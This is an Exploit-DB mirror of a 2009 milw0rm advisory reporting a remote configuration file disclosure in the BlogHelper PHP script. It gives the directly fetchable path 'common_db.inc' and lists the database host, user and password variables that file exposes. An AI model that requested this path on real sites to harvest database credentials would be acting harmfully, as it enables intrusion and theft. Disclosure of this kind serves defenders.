exploit-db-mirror/platforms/php/webapps/7689.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

28 lines
791 B
Text
Executable file

......
Remote Config File Disclosure
----------------------------------------------------
script: BlogHelper
***************************************************************************
download from:http://www.freedville.com/oss/BlogHelper.zip
***************************************************************************
vul:
www.site.com/path/common_db.inc
................................
$dbhost = "";
$dbusername = "";
$dbuserpass = "";
$default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------
*************************************************
Author: ahmadbady
*************************************************
# milw0rm.com [2009-01-06]